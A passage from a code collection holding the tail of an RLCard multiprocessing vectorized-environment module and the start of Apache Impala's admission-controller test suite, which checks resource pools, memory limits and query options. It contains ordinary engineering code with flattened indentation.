config (dict): The same as the config in Env
'''
self.num = config['env_num']
# For multiprocessing
ctx = mp.get_context('spawn')
self.remotes, self.work_remotes = zip(*[ctx.Pipe() for _ in range(self.num)])
self.ps = [ctx.Process(target=worker, args=(work_remote, remote, env_id, config))
for (work_remote, remote) in zip(self.work_remotes, self.remotes)]
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
p.start()
for remote in self.work_remotes:
remote.close()
# A counter for the timesteps
self.timestep = 0
# Get the number of players/actions/state_shape in this game
self.remotes[0].send(('info', None))
self.player_num, self.action_num, self.state_shape = self.remotes[0].recv()
self._seed(config['seed'])
def set_agents(self, agents):
self.agents = agents
def run(self, is_training=False):
''' Run X complete games, where X is the number of environemnts.
The input/output are similar to Env. The difference is that
The transitions for each player are stacked over the environments
'''
trajectories = [[[] for _ in range(self.player_num)] for _ in range(self.num)]
ready_trajectories = [None for _ in range(self.num)]
active_remotes = [remote for remote in self.remotes]
mapping = [i for i in range(self.num)]
active_num = self.num
# Reset
states = []
player_ids = []
for state, player_id in send_command_to_all(active_remotes, ('reset', None)):
states.append(state)
player_ids.append(player_id)
for i in range(active_num):
trajectories[i][player_ids[i]].append(states[i])
# Loop until all the environments are over
while active_num > 0:
# Agent playes
# TODO: Currently we naively feed one obs to the agent. This can be improved via batch
commands = []
actions = []
for i in range(active_num):
opt = 'raw_step' if self.agents[player_ids[i]].use_raw else 'step'
if not is_training:
action, _ = self.agents[player_ids[i]].eval_step(states[i])
else:
action = self.agents[player_ids[i]].step(states[i])
commands.append((opt, action))
actions.append(action)
# Environment steps
next_states, next_player_ids, dones = [], [], []
for next_state, next_player_id, done in send_commands_to_all(active_remotes, commands):
next_states.append(next_state)
next_player_ids.append(next_player_id)
dones.append(done)
# Save action
for i in range(active_num):
trajectories[i][player_ids[i]].append(actions[i])
# Set the state and player
states = next_states
player_ids = next_player_ids
# Save state
finished = []
for i in range(active_num):
if dones[i]:
# Add a final state to all the players
for j in range(self.player_num):
active_remotes[i].send(('get_state', j))
trajectories[i][j].append(active_remotes[i].recv())
# Save the ready trajectories and mark them as finished
ready_trajectories[mapping[i]] = trajectories[i]
finished.append(i)
else:
trajectories[i][player_ids[i]].append(states[i])
# Pop out the finished ones
trajectories = [trajectories[i] for i in range(active_num) if i not in finished]
mapping = [mapping[i] for i in range(active_num) if i not in finished]
active_remotes = [active_remotes[i] for i in range(active_num) if i not in finished]
states = [states[i] for i in range(active_num) if i not in finished]
player_ids = [player_ids[i] for i in range(active_num) if i not in finished]
self.timestep += active_num
active_num -= len(finished)
# Payoffs
payoffs = send_command_to_all(self.remotes, ('get_payoffs', None))
for i in range(self.num):
ready_trajectories[i] = reorganize(ready_trajectories[i], payoffs[i])
trajectories = [[] for _ in range(self.player_num)]
for trs in ready_trajectories:
for i in range(self.player_num):
trajectories[i].extend(trs[i])
return trajectories, payoffs
def _seed(self, seed=None):
seeds = [None for _ in range(self.num)]
if seed is not None:
commands = [('seed', seed+i*1000) for i in range(self.num)]
seeds = send_commands_to_all(self.remotes, commands)
return seeds
def send_commands_to_all(remotes, commands):
results = []
for i, remote in enumerate(remotes):
remote.send(commands[i])
for remote in remotes:
results.append(remote.recv())
return results
def send_command_to_all(remotes, command):
results = []
for remote in remotes:
remote.send(command)
for remote in remotes:
results.append(remote.recv())
return results
def worker(remote, parent_remote, env_id, config):
def step_env(env, action, use_raw):
state, player_id = env.step(action, use_raw)
done = env.is_over()
return state, player_id, done
from rlcard.envs.registration import registry
env = registry.make(env_id, config)
parent_remote.close()
try:
while True:
cmd, data = remote.recv()
if cmd == 'reset':
remote.send(env.reset())
elif cmd == 'step_raw':
remote.send(step_env(env, data, True))
elif cmd == 'step':
remote.send(step_env(env, data, False))
elif cmd == 'seed':
remote.send(env._seed(data))
elif cmd == 'get_state':
remote.send(env.get_state(data))
elif cmd == 'get_payoffs':
remote.send(env.get_payoffs())
elif cmd == 'info':
remote.send((env.player_num, env.action_num, env.state_shape))
elif cmd == 'close':
remote.close()
break
else:
raise NotImplementedError
except KeyboardInterrupt:
print('SubprocVecEnv worker: got KeyboardInterrupt')
finally:
del env
|
test_admission_controller.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# Tests admission control
import itertools
import logging
import os
import pytest
import re
import shutil
import sys
import threading
from copy import copy
from time import sleep, time
from beeswaxd.BeeswaxService import QueryState
from tests.beeswax.impala_beeswax import ImpalaBeeswaxException
from tests.common.custom_cluster_test_suite import CustomClusterTestSuite
from tests.common.environ import build_flavor_timeout, ImpalaTestClusterProperties
from tests.common.impala_test_suite import ImpalaTestSuite
from tests.common.resource_pool_config import ResourcePoolConfig
from tests.common.skip import (
SkipIfS3,
SkipIfABFS,
SkipIfADLS,
SkipIfEC,
SkipIfNotHdfsMinicluster,
SkipIfOS)
from tests.common.test_dimensions import (
create_single_exec_option_dimension,
create_uncompressed_text_dimension)
from tests.common.test_vector import ImpalaTestDimension
from tests.hs2.hs2_test_suite import HS2TestSuite, needs_session
from tests.util.web_pages_util import (
get_num_completed_backends,
get_mem_admitted_backends_debug_page)
from tests.verifiers.mem_usage_verifier import MemUsageVerifier
from tests.verifiers.metric_verifier import MetricVerifier
from ImpalaService import ImpalaHiveServer2Service
from TCLIService import TCLIService
LOG = logging.getLogger('admission_test')
# The query used for testing. It is important that this query returns many rows
# while keeping fragments active on all backends. This allows a thread to keep
# the query active and consuming resources by fetching one row at a time. The
# where clause is for debugging purposes; each thread will insert its id so
# that running queries can be correlated with the thread that submitted them.
QUERY = " union all ".join(["select * from functional.alltypesagg where id != {0}"] * 30)
# The statestore heartbeat and topic update frequency (ms). Set low for testing.
STATESTORE_RPC_FREQUENCY_MS = 100
# Time to sleep (in milliseconds) between issuing queries. When the delay is at least
# the statestore heartbeat frequency, all state should be visible by every impalad by
# the time the next query is submitted. Otherwise the different impalads will see stale
# state for some admission decisions.
SUBMISSION_DELAY_MS = \
[0, STATESTORE_RPC_FREQUENCY_MS / 2, STATESTORE_RPC_FREQUENCY_MS * 3 / 2]
# The number of queries to submit. The test does not support fewer queries than
# MAX_NUM_CONCURRENT_QUERIES + MAX_NUM_QUEUED_QUERIES to keep some validation logic
# simple.
NUM_QUERIES = [15, 30, 50]
# Whether we will submit queries to all available impalads (in a round-robin fashion)
ROUND_ROBIN_SUBMISSION = [True, False]
# The query pool to use. The impalads should be configured to recognize this
# pool with the parameters below.
POOL_NAME = "default-pool"
# Stress test timeout (seconds). The timeout needs to be significantly higher for
# slow builds like code coverage and ASAN (IMPALA-3790, IMPALA-6241).
STRESS_TIMEOUT = build_flavor_timeout(90, slow_build_timeout=600)
# The number of queries that can execute concurrently in the pool POOL_NAME.
MAX_NUM_CONCURRENT_QUERIES = 5
# The number of queries that can be queued in the pool POOL_NAME
MAX_NUM_QUEUED_QUERIES = 10
# Mem limit (bytes) used in the mem limit test
MEM_TEST_LIMIT = 12 * 1024 * 1024 * 1024
_STATESTORED_ARGS = ("-statestore_heartbeat_frequency_ms={freq_ms} "
"-statestore_priority_update_frequency_ms={freq_ms}").format(
freq_ms=STATESTORE_RPC_FREQUENCY_MS)
# Name of the subscriber metric tracking the admission control update interval.
REQUEST_QUEUE_UPDATE_INTERVAL =\
'statestore-subscriber.topic-impala-request-queue.update-interval'
# Key in the query profile for the query options.
PROFILE_QUERY_OPTIONS_KEY = "Query Options (set by configuration): "
# The different ways that a query thread can end its query.
QUERY_END_BEHAVIORS = ['EOS', 'CLIENT_CANCEL', 'QUERY_TIMEOUT', 'CLIENT_CLOSE']
# The timeout used for the QUERY_TIMEOUT end behaviour
QUERY_END_TIMEOUT_S = 1
# Value used for --admission_control_stale_topic_threshold_ms in tests.
STALE_TOPIC_THRESHOLD_MS = 500
# Regex that matches the first part of the profile info string added when a query is
# queued.
INITIAL_QUEUE_REASON_REGEX = \
"Initial admission queue reason: waited [0-9]* ms, reason: .*"
# The path to resources directory which contains the admission control config files.
RESOURCES_DIR = os.path.join(os.environ['IMPALA_HOME'], "fe", "src", "test", "resources")
def impalad_admission_ctrl_flags(max_requests, max_queued, pool_max_mem,
proc_mem_limit=None, queue_wait_timeout_ms=None,
admission_control_slots=None, executor_groups=None):
extra_flags = ""
if proc_mem_limit is not None:
extra_flags += " -mem_limit={0}".format(proc_mem_limit)
if queue_wait_timeout_ms is not None:
extra_flags += " -queue_wait_timeout_ms={0}".format(queue_wait_timeout_ms)
if admission_control_slots is not None:
extra_flags += " -admission_control_slots={0}".format(admission_control_slots)
if executor_groups is not None:
extra_flags += " -executor_groups={0}".format(executor_groups)
return ("-vmodule admission-controller=3 -default_pool_max_requests {0} "
"-default_pool_max_queued {1} -default_pool_mem_limit {2} {3}".format(
max_requests, max_queued, pool_max_mem, extra_flags))
def impalad_admission_ctrl_config_args(fs_allocation_file, llama_site_file,
additional_args="", make_copy=False):
fs_allocation_path = os.path.join(RESOURCES_DIR, fs_allocation_file)
llama_site_path = os.path.join(RESOURCES_DIR, llama_site_file)
if make_copy:
copy_fs_allocation_path = os.path.join(RESOURCES_DIR, "copy-" + fs_allocation_file)
copy_llama_site_path = os.path.join(RESOURCES_DIR, "copy-" + llama_site_file)
shutil.copy2(fs_allocation_path, copy_fs_allocation_path)
shutil.copy2(llama_site_path, copy_llama_site_path)
fs_allocation_path = copy_fs_allocation_path
llama_site_path = copy_llama_site_path
return ("-vmodule admission-controller=3 -fair_scheduler_allocation_path %s "
"-llama_site_path %s %s" % (fs_allocation_path, llama_site_path,
additional_args))
def log_metrics(log_prefix, metrics):
LOG.info("%sadmitted=%s, queued=%s, dequeued=%s, rejected=%s, "
"released=%s, timed-out=%s", log_prefix, metrics['admitted'], metrics['queued'],
metrics['dequeued'], metrics['rejected'], metrics['released'],
metrics['timed-out'])
def compute_metric_deltas(m2, m1):
"""Returns a dictionary of the differences of metrics in m2 and m1 (m2 - m1)"""
return dict((n, m2.get(n, 0) - m1.get(n, 0)) for n in m2.keys())
def metric_key(pool_name, metric_name):
"""Helper method to construct the admission controller metric keys"""
return "admission-controller.%s.%s" % (metric_name, pool_name)
class TestAdmissionControllerBase(CustomClusterTestSuite):
@classmethod
def get_workload(self):
return 'functional-query'
@classmethod
def add_test_dimensions(cls):
super(TestAdmissionControllerBase, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_dimension(create_single_exec_option_dimension())
# There's no reason to test this on other file formats/compression codecs right now
cls.ImpalaTestMatrix.add_dimension(
create_uncompressed_text_dimension(cls.get_workload()))
class TestAdmissionController(TestAdmissionControllerBase, HS2TestSuite):
def __check_pool_rejected(self, client, pool, expected_error_re):
try:
client.set_configuration({'request_pool': pool})
client.execute("select 1")
assert False, "Query should return error"
except ImpalaBeeswaxException as e:
assert re.search(expected_error_re, str(e))
def __check_query_options(self, profile, expected_query_options):
"""Validate that the expected per-pool query options were set on the specified
profile. expected_query_options is a list of "KEY=VALUE" strings, e.g.
["MEM_LIMIT=1", ...]"""
confs = []
for line in profile.split("\n"):
if PROFILE_QUERY_OPTIONS_KEY in line:
rhs = re.split(": ", line)[1]
confs = re.split(",", rhs)
break
expected_set = set([x.lower() for x in expected_query_options])
confs_set = set([x.lower() for x in confs])
assert expected_set.issubset(confs_set)
def __check_hs2_query_opts(self, pool_name, mem_limit=None, expected_options=None):
""" Submits a query via HS2 (optionally with a mem_limit in the confOverlay)
into pool_name and checks that the expected_query_options are set in the
profile."""
execute_statement_req = TCLIService.TExecuteStatementReq()
execute_statement_req.sessionHandle = self.session_handle
execute_statement_req.confOverlay = {'request_pool': pool_name}
if mem_limit is not None: execute_statement_req.confOverlay['mem_limit'] = mem_limit
execute_statement_req.statement = "select 1"
execute_statement_resp = self.hs2_client.ExecuteStatement(execute_statement_req)
HS2TestSuite.check_response(execute_statement_resp)
fetch_results_req = TCLIService.TFetchResultsReq()
fetch_results_req.operationHandle = execute_statement_resp.operationHandle
fetch_results_req.maxRows = 1
fetch_results_resp = self.hs2_client.FetchResults(fetch_results_req)
HS2TestSuite.check_response(fetch_results_resp)
close_operation_req = TCLIService.TCloseOperationReq()
close_operation_req.operationHandle = execute_statement_resp.operationHandle
HS2TestSuite.check_response(self.hs2_client.CloseOperation(close_operation_req))
get_profile_req = ImpalaHiveServer2Service.TGetRuntimeProfileReq()
get_profile_req.operationHandle = execute_statement_resp.operationHandle
get_profile_req.sessionHandle = self.session_handle
get_profile_resp = self.hs2_client.GetRuntimeProfile(get_profile_req)
HS2TestSuite.check_response(get_profile_resp)
self.__check_query_options(get_profile_resp.profile, expected_options)
def _execute_and_collect_profiles(self, queries, timeout_s, config_options={},
allow_query_failure=False):
"""Submit the query statements in 'queries' in parallel to the first impalad in
the cluster. After submission, the results are fetched from the queries in
sequence and their profiles are collected. Wait for up to timeout_s for
each query to finish. If 'allow_query_failure' is True, succeeds if the query
completes successfully or ends up in the EXCEPTION state. Otherwise expects the
queries to complete successfully.
Returns the profile strings."""
client = self.cluster.impalads[0].service.create_beeswax_client()
expected_states = [client.QUERY_STATES['FINISHED']]
if allow_query_failure:
expected_states.append(client.QUERY_STATES['EXCEPTION'])
try:
handles = []
profiles = []
client.set_configuration(config_options)
for query in queries:
handles.append(client.execute_async(query))
for query, handle in zip(queries, handles):
state = self.wait_for_any_state(handle, expected_states, timeout_s)
if state == client.QUERY_STATES['FINISHED']:
self.client.fetch(query, handle)
profiles.append(self.client.get_runtime_profile(handle))
return profiles
finally:
client.close()
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(
fs_allocation_file="fair-scheduler-test2.xml",
llama_site_file="llama-site-test2.xml"),
default_query_options=[('mem_limit', 200000000)],
statestored_args=_STATESTORED_ARGS)
@needs_session(conf_overlay={'batch_size': '100'})
def test_set_request_pool(self):
"""Tests setting the REQUEST_POOL with the pool placement policy configured
to require a specific pool, and validate that the per-pool configurations were
applied."""
impalad = self.cluster.impalads[0]
client = impalad.service.create_beeswax_client()
# Expected default mem limit for queueA, used in several tests below
queueA_mem_limit = "MEM_LIMIT=%s" % (128 * 1024 * 1024)
try:
for pool in ['', 'not_a_pool_name']:
expected_error =\
"No mapping found for request from user '\S+' with requested pool '%s'"\
% (pool)
self.__check_pool_rejected(client, pool, expected_error)
# Check rejected if user does not have access.
expected_error = "Request from user '\S+' with requested pool 'root.queueC' "\
"denied access to assigned pool 'root.queueC'"
self.__check_pool_rejected(client, 'root.queueC', expected_error)
# Also try setting a valid pool
client.set_configuration({'request_pool': 'root.queueB'})
result = client.execute("select 1")
# Query should execute in queueB which doesn't have a default mem limit set in the
# llama-site.xml, so it should inherit the value from the default process query
# options.
self.__check_query_options(result.runtime_profile,
['MEM_LIMIT=200000000', 'REQUEST_POOL=root.queueB'])
# Try setting the pool for a queue with a very low queue timeout.
# queueA allows only 1 running query and has a queue timeout of 50ms, so the
# second concurrent query should time out quickly.
client.set_configuration({'request_pool': 'root.queueA'})
handle = client.execute_async("select sleep(1000)")
self.__check_pool_rejected(client, 'root.queueA', "exceeded timeout")
assert client.get_state(handle) == client.QUERY_STATES['FINISHED']
# queueA has default query options mem_limit=128m,query_timeout_s=5
self.__check_query_options(client.get_runtime_profile(handle),
[queueA_mem_limit, 'QUERY_TIMEOUT_S=5', 'REQUEST_POOL=root.queueA'])
client.close_query(handle)
# Should be able to set query options via the set command (overriding defaults if
# applicable). mem_limit overrides the pool default. abort_on_error has no
# proc/pool default.
client.execute("set mem_limit=31337")
client.execute("set abort_on_error=1")
result = client.execute("select 1")
self.__check_query_options(result.runtime_profile,
['MEM_LIMIT=31337', 'ABORT_ON_ERROR=1', 'QUERY_TIMEOUT_S=5',
'REQUEST_POOL=root.queueA'])
# Should be able to set query options (overriding defaults if applicable) with the
# config overlay sent with the query RPC. mem_limit is a pool-level override and
# max_io_buffers has no proc/pool default.
client.set_configuration({'request_pool': 'root.queueA', 'mem_limit': '12345'})
result = client.execute("select 1")
self.__check_query_options(result.runtime_profile,
['MEM_LIMIT=12345', 'QUERY_TIMEOUT_S=5', 'REQUEST_POOL=root.queueA',
'ABORT_ON_ERROR=1'])
# Once options are reset to their defaults, the queue
# configuration should kick back in. We'll see the
# queue-configured mem_limit, and we won't see
# abort on error, because it's back to being the default.
client.execute('set mem_limit=""')
client.execute('set abort_on_error=""')
client.set_configuration({'request_pool': 'root.queueA'})
result = client.execute("select 1")
self.__check_query_options(result.runtime_profile,
[queueA_mem_limit, 'REQUEST_POOL=root.queueA', 'QUERY_TIMEOUT_S=5'])
finally:
client.close()
# HS2 tests:
# batch_size is set in the HS2 OpenSession() call via the requires_session() test
# decorator, so that is included in all test cases below.
batch_size = "BATCH_SIZE=100"
# Check HS2 query in queueA gets the correct query options for the pool.
self.__check_hs2_query_opts("root.queueA", None,
[queueA_mem_limit, 'QUERY_TIMEOUT_S=5', 'REQUEST_POOL=root.queueA', batch_size])
# Check overriding the mem limit sent in the confOverlay with the query.
self.__check_hs2_query_opts("root.queueA", '12345',
['MEM_LIMIT=12345', 'QUERY_TIMEOUT_S=5', 'REQUEST_POOL=root.queueA', batch_size])
# Check HS2 query in queueB gets the process-wide default query options
self.__check_hs2_query_opts("root.queueB", None,
['MEM_LIMIT=200000000', 'REQUEST_POOL=root.queueB', batch_size])
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(
fs_allocation_file="fair-scheduler-test2.xml",
llama_site_file="llama-site-test2.xml",
additional_args="-require_username"),
statestored_args=_STATESTORED_ARGS)
def test_require_user(self):
open_session_req = TCLIService.TOpenSessionReq()
open_session_req.username = ""
open_session_resp = self.hs2_client.OpenSession(open_session_req)
TestAdmissionController.check_response(open_session_resp)
try:
execute_statement_req = TCLIService.TExecuteStatementReq()
execute_statement_req.sessionHandle = open_session_resp.sessionHandle
execute_statement_req.statement = "select count(1) from functional.alltypes"
execute_statement_resp = self.hs2_client.ExecuteStatement(execute_statement_req)
self.wait_for_operation_state(execute_statement_resp.operationHandle,
TCLIService.TOperationState.ERROR_STATE)
get_operation_status_resp = self.get_operation_status(
execute_statement_resp.operationHandle)
assert "User must be specified" in get_operation_status_resp.errorMessage
finally:
close_req = TCLIService.TCloseSessionReq()
close_req.sessionHandle = open_session_resp.sessionHandle
TestAdmissionController.check_response(self.hs2_client.CloseSession(close_req))
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=1,
pool_max_mem=10 * 1024 * 1024, proc_mem_limit=1024 * 1024 * 1024),
statestored_args=_STATESTORED_ARGS)
def test_trivial_coord_query_limits(self):
"""Tests that trivial coordinator only queries have negligible resource requirements.
"""
if self.exploration_strategy() != 'exhaustive':
pytest.skip('runs only in exhaustive')
# Queries with only constant exprs or limit 0 should be admitted.
self.execute_query_expect_success(self.client, "select 1")
self.execute_query_expect_success(self.client,
"select * from functional.alltypes limit 0")
non_trivial_queries = [
"select * from functional.alltypesagg limit 1",
"select * from functional.alltypestiny"]
for query in non_trivial_queries:
ex = self.execute_query_expect_failure(self.client, query)
assert re.search("Rejected query from pool default-pool: request memory needed "
".* is greater than pool max mem resources 10.00 MB", str(ex))
@SkipIfS3.hdfs_block_size
@SkipIfABFS.hdfs_block_size
@SkipIfADLS.hdfs_block_size
@SkipIfEC.fix_later
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=1,
pool_max_mem=40 * 1024 * 1024, proc_mem_limit=1024 * 1024 * 1024),
statestored_args=_STATESTORED_ARGS)
def test_memory_rejection(self, vector):
"""Test that rejection of queries based on reservation and estimates works as
expected. The test depends on scanner memory estimates, which different on remote
filesystems with different (synthetic) block sizes."""
# Test that the query will be rejected by admission control if:
# a) the largest per-backend min buffer reservation is larger than the query mem limit
# b) the largest per-backend min buffer reservation is larger than the
# buffer_pool_limit query option
# c) the cluster-wide min-buffer reservation size is larger than the pool memory
# resources.
self.run_test_case('QueryTest/admission-reject-min-reservation', vector)
# Test that queries are rejected based on memory estimates. Set num_nodes=1 to
# avoid unpredictability from scheduling on different backends.
exec_options = vector.get_value('exec_option')
exec_options['num_nodes'] = 1
self.run_test_case('QueryTest/admission-reject-mem-estimate', vector)
# Process mem_limit used in test_mem_limit_upper_bound
PROC_MEM_TEST_LIMIT = 1024 * 1024 * 1024
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=1,
pool_max_mem=10 * PROC_MEM_TEST_LIMIT, proc_mem_limit=PROC_MEM_TEST_LIMIT))
def test_mem_limit_upper_bound(self, vector):
""" Test to ensure that a query is admitted if the requested memory is equal to the
process mem limit"""
query = "select * from functional.alltypesagg limit 1"
exec_options = vector.get_value('exec_option')
# Setting requested memory equal to process memory limit
exec_options['mem_limit'] = self.PROC_MEM_TEST_LIMIT
self.execute_query_expect_success(self.client, query, exec_options)
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=1,
pool_max_mem=10 * PROC_MEM_TEST_LIMIT, proc_mem_limit=PROC_MEM_TEST_LIMIT),
num_exclusive_coordinators=1)
def test_mem_limit_dedicated_coordinator(self, vector):
"""Regression test for IMPALA-8469: coordinator fragment should be admitted on
dedicated coordinator"""
query = "select * from functional.alltypesagg limit 1"
exec_options = vector.get_value('exec_option')
# Test both single-node and distributed plans
for num_nodes in [0, 1]:
# Memory just fits in memory limits
exec_options['mem_limit'] = self.PROC_MEM_TEST_LIMIT
exec_options['num_nodes'] = num_nodes
self.execute_query_expect_success(self.client, query, exec_options)
# A bit too much memory to run on coordinator.
exec_options['mem_limit'] = long(self.PROC_MEM_TEST_LIMIT * 1.1)
ex = self.execute_query_expect_failure(self.client, query, exec_options)
assert ("Rejected query from pool default-pool: request memory needed "
"1.10 GB is greater than memory available for admission 1.00 GB" in
str(ex)), str(ex)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(
fs_allocation_file="mem-limit-test-fair-scheduler.xml",
llama_site_file="mem-limit-test-llama-site.xml"), num_exclusive_coordinators=1,
cluster_size=2)
def test_dedicated_coordinator_mem_accounting(self, vector):
"""Verify that when using dedicated coordinators, the memory admitted for and the
mem limit applied to the query fragments running on the coordinator is different than
the ones on executors."""
self.__verify_mem_accounting(vector, using_dedicated_coord_estimates=True)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(
fs_allocation_file="mem-limit-test-fair-scheduler.xml",
llama_site_file="mem-limit-test-llama-site.xml")
+ " -use_dedicated_coordinator_estimates false",
num_exclusive_coordinators=1,
cluster_size=2)
def test_dedicated_coordinator_legacy_mem_accounting(self, vector):
"""Verify that when using dedicated coordinators with specialized dedicated coord
estimates turned off using a hidden startup param, the memory admitted for and the
mem limit applied to the query fragments running on the coordinator is the same
(as expected from legacy behavior)."""
self.__verify_mem_accounting(vector, using_dedicated_coord_estimates=False)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_config_args(
fs_allocation_file="mem-limit-test-fair-scheduler.xml",
llama_site_file="mem-limit-test-llama-site.xml"), num_exclusive_coordinators=1,
cluster_size=2)
def test_sanity_checks_dedicated_coordinator(self, vector, unique_database):
"""Sanity tests for verifying targeted dedicated coordinator memory estimations and
behavior."""
self.client.set_configuration_option('request_pool', "root.regularPool")
ImpalaTestSuite.change_database(self.client, vector.get_value('table_format'))
exec_options = vector.get_value('exec_option')
# Make sure query option MAX_MEM_ESTIMATE_FOR_ADMISSION is enforced on the dedicated
# coord estimates. Without this query option the estimate would be > 100MB.
expected_mem = 60 * (1 << 20) # 60MB
exec_options['MAX_MEM_ESTIMATE_FOR_ADMISSION'] = expected_mem
self.client.set_configuration(exec_options)
handle = self.client.execute_async(QUERY.format(1))
self.client.wait_for_finished_timeout(handle, 1000)
mem_to_admit = self.__get_mem_limits_admission_debug_page()
assert abs(mem_to_admit['coordinator'] - expected_mem) < 0.0001,\
"mem_to_admit:" + str(mem_to_admit)
assert abs(mem_to_admit['executor'] - expected_mem) < 0.0001, \
"mem_to_admit:" + str(mem_to_admit)
self.client.close_query(handle)
# If the query is only scheduled on the coordinator then the mem to admit on executor
# should be zero.
exec_options['NUM_NODES'] = 1
self.client.set_configuration(exec_options)
handle = self.client.execute_async(QUERY.format(1))
self.client.wait_for_finished_timeout(handle, 1000)
mem_to_admit = self.__get_mem_limits_admission_debug_page()
assert abs(mem_to_admit['coordinator'] - expected_mem) < 0.0001, \
"mem_to_admit:" + str(mem_to_admit)
assert abs(mem_to_admit['executor'] - 0) < 0.0001, \
"mem_to_admit:" + str(mem_to_admit)
self.client.close_query(handle)
# Make sure query execution works perfectly for a query that does not have any
# fragments schdeuled on the coordinator, but has runtime-filters that need to be
# aggregated at the coordinator.
exec_options = vector.get_value('exec_option')
exec_options['RUNTIME_FILTER_WAIT_TIME_MS'] = 30000
query = """CREATE TABLE {0}.temp_tbl AS SELECT STRAIGHT_JOIN o_orderkey
FROM tpch_parquet.lineitem INNER JOIN [SHUFFLE] tpch_parquet.orders
ON o_orderkey = l_orderkey GROUP BY 1""".format(unique_database)
result = self.execute_query_expect_success(self.client, query, exec_options)
assert "Runtime filters: All filters arrived" in result.runtime_profile
def __verify_mem_accounting(self, vector, using_dedicated_coord_estimates):
"""Helper method used by test_dedicated_coordinator_*_mem_accounting that verifies
the actual vs expected values for mem admitted and mem limit for both coord and
executor. Also verifies that those memory values are different if
'using_dedicated_coord_estimates' is true."""
self.client.set_configuration_option('request_pool', "root.regularPool")
ImpalaTestSuite.change_database(self.client, vector.get_value('table_format'))
handle = self.client.execute_async(QUERY.format(1))
self.client.wait_for_finished_timeout(handle, 1000)
expected_mem_limits = self.__get_mem_limits_admission_debug_page()
actual_mem_limits = self.__get_mem_limits_memz_debug_page(handle.get_handle().id)
mem_admitted = get_mem_admitted_backends_debug_page(self.cluster)
debug_string = " expected_mem_limits:" + str(
expected_mem_limits) + " actual_mem_limits:" + str(
actual_mem_limits) + " mem_admitted:" + str(mem_admitted)
MB = 1 << 20
# Easiest way to check float in-equality.
assert abs(expected_mem_limits['coordinator'] - expected_mem_limits[
'executor']) > 0.0001 or not using_dedicated_coord_estimates, debug_string
# There may be some rounding errors so keep a margin of 5MB when verifying
assert abs(actual_mem_limits['coordinator'] - expected_mem_limits[
'coordinator']) < 5 * MB, debug_string
assert abs(actual_mem_limits['executor'] - expected_mem_limits[
'executor']) < 5 * MB, debug_string
assert abs(mem_admitted['coordinator'] - expected_mem_limits[
'coordinator']) < 5 * MB, debug_string
assert abs(
mem_admitted['executor'][0] - expected_mem_limits['executor']) < 5 * MB, \
debug_string
def __get_mem_limits_admission_debug_page(self):
"""Helper method assumes a 2 node cluster using a dedicated coordinator. Returns the
mem_limit calculated by the admission controller from the impala admission debug page
of the coordinator impala daemon. Returns a dictionary with the keys 'coordinator'
and 'executor' and their respective mem values in bytes."""
# Based on how the cluster is setup, the first impalad in the cluster is the
# coordinator.
response_json = self.cluster.impalads[0].service.get_debug_webpage_json("admission")
assert 'resource_pools' in response_json
assert len(response_json['resource_pools']) == 1
assert response_json['resource_pools'][0]['running_queries']
assert len(response_json['resource_pools'][0]['running_queries']) == 1
query_info = response_json['resource_pools'][0]['running_queries'][0]
return {'coordinator': float(query_info["coord_mem_to_admit"]),
'executor': float(query_info["mem_limit"])}
def __get_mem_limits_memz_debug_page(self, query_id):
"""Helper method assumes a 2 node cluster using a dedicated coordinator. Returns the
mem limits enforced on the query (identified by the 'query_id') extracted from
mem-tracker's output on the memz debug page of the dedicated coordinator and the
executor impala daemons. Returns a dictionary with the keys 'coordinator' and
'executor' and their respective mem values in bytes."""
metric_name = "Query({0})".format(query_id)
# Based on how the cluster is setup, the first impalad in the cluster is the
# coordinator.
mem_trackers = [MemUsageVerifier(i.service).get_mem_usage_values(metric_name) for i in
self.cluster.impalads]
return {'coordinator': float(mem_trackers[0]['limit']),
'executor': float(mem_trackers[1]['limit'])}
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(num_exclusive_coordinators=1)
def test_dedicated_coordinator_planner_estimates(self, vector, unique_database):
"""Planner tests to add coverage for coordinator estimates when using dedicated
coordinators. Also includes coverage for verifying cluster memory admitted."""
vector_copy = copy(vector)
exec_options = vector_copy.get_value('exec_option')
# Remove num_nodes from the options to allow test case runner to set it in one of
# the test cases.
del exec_options['num_nodes']
exec_options['num_scanner_threads'] = 1 # To make estimates consistently reproducible
self.run_test_case('QueryTest/dedicated-coord-mem-estimates', vector_copy,
unique_database)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(num_exclusive_coordinators=1, cluster_size=2)
def test_mem_limit_executors(self, vector, unique_database):
"""Verify that the query option mem_limit_executors is only enforced on the
executors."""
expected_exec_mem_limit = "999999999"
ImpalaTestSuite.change_database(self.client, vector.get_value('table_format'))
